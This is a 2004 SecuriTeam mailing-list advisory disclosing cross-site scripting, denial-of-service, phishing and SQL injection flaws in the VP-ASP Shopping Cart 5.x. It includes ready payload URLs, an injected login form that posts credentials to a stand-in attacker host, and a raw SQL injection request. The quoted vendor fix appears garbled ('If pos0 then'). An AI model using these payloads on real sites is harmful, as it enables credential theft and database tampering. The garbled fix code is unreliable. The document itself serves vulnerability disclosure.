[NT] VP-ASP Shopping Cart Multiple Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 06/16/04
- Previous message: SecuriTeam: "[NT] WinAgents TFTP Server Remote DoS (Long Filename)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 16 Jun 2004 17:32:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
VP-ASP Shopping Cart Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.vpasp.com/> Virtual Programming VP-ASP is "a shopping cart
application for e-commerce enabled sites. It is written in ASP, supports
the following databases: Access, MSSQL, MySQL on Windows and MySQL on
UNIX". More cross-site scripting and SQL injection vulnerabilities were
found by further research done on the VP-ASP's code after a vendor fix for
filtering out script tags was put in place by the vendor.
DETAILS
Vulnerable Systems:
* VP-ASP Shopping Cart version 5.x
Although a subroutine was put in place by the vendor that performs input
filtering on script tags, the application is still highly susceptible to
XSS attacks and SQL injections. In addition, the application is still
vulnerable to URL encoding vulnerabilities that manifest by opening up a
myriad of attack possibilities. It seems that most if not all pages in
VP-ASP are vulnerable. Some examples are provided below:
Cross-site Scripting
http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5&cat=<img
src="javascr!pt:alert('XSS')">
http://[VICTIM]/vpasp/shoperror.asp?msg=<img
src="javascr!pt:alert('XSS')">
Although many believe XSS attacks boil down to simple JavaScript issues,
they are much more potent and can be used by a clever attacker to do many
things.
Denial of Service
http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5&cat=<meta
http-equiv='refresh'content='0'>
http://[VICTIM]/vpasp/shoperror.asp?msg=<meta
http-equiv='refresh'content='0'>
Parameter Tampering / Phishing
http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5&cat=<form
action="http://www.evilhacker.com/save2db.asp"
method="post">Username:<input name="username" type="text"
maxlength="30"><br>Password:<input name="password" type="text"
maxlength="30"><br><input name="login" type="submit" value="Login"></form>
SQL Injection
Outlined below is a POST HTTP request that will accomplish the desired
effect:
POST /vpasp/shopproductselect.asp HTTP/1.0
Referer:
http://[VICTIM]:80/vpasp/shopdisplayproducts.asp?id=6&cat=Groceries
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: [VICTIM]
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ALT.COOKIE.NAME.2=8P.9.7080.2N2,20.B9N9P954OO4OM4,4;
CustomCookie=TommyRyan
x1Feature1=28&x2Feature1=18&prodindex=3&quantity=1&quantity=1&quantity=1&act
ion.x=5&action.y=5&Processed0=15+AND+'a'>'z'&Processed1=14+AND+'a'>'z'&x2Fea
turevalue1=19%2C+17%2C+18&Processed2=16&x1FeatureValue1=+2+dozen+%5B3.50%5D
Vendor Status:
Currently the vendor supplied workaround for this vulnerability is to add
a line in the Edit file shop$db.asp file:
Original:
Sub CleanseMessage (msg, rc)
dim lmsg, pos
lmsg=lcase(msg)
pos=instr(lmsg, "<script>")
If pos> 0 then
rc=4
else
rc=0
end if
end sub
Modified:
Sub CleanseMessage (msg, rc)
dim lmsg, pos
lmsg=lcase(msg)
pos=instr(lmsg, "<script>")
If pos0 then
rc=4
else
rc=0
msg=server.htmlencode(msg)
end if
end sub
Disclosure Timeline
05/14/2004 - Vulnerability Found
05/26/2004 - Reported to Vendor
06/09/2004 - Contacted Vendor Again
06/10/2004 - Developed a document for vendor showing block for <scr!pt>
doesn't work
06/11/2004 - Vendor researching for quick fix for current customers
06/12/2004 - Vendor Release vulnerability fix without Tom's testing and no
credit for research
<http://www.vpasp.com/virtprog/info/faq_securityfixes.htm>
http://www.vpasp.com/virtprog/info/faq_securityfixes.htm
06/12/2004 - Tom Ryan tested VP-ASP Cart and Cart Failed to Validate for
URL-Encoding
06/13/2004 - Worked with Virtual Programming to fix all problems.
06/14/2004 - Tom Ryan detailed vulnerability release
ADDITIONAL INFORMATION
The information has been provided by <mailto:tommy@providesecurity.com>
Thomas Ryan.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] WinAgents TFTP Server Remote DoS (Long Filename)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
